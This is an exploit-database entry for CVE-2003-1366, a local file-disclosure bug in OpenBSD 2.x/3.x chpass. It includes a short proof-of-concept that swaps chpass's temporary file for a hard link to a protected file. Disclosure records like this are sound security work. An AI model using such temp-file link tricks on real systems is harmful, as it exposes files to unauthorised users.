[] NeoSense
E X P L O I T S
title author type platform port cve id

OpenBSD 2.x/3.x - CHPass Temporary File Link File Content Revealing

Author: Marc Bevand
type: local
platform: openbsd
port: 
date_added: 2003-02-03 
date_updated: 2012-10-24 
verified: 1 
codes: CVE-2003-1366;OSVDB-60351 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/6748/info

It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary.

# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.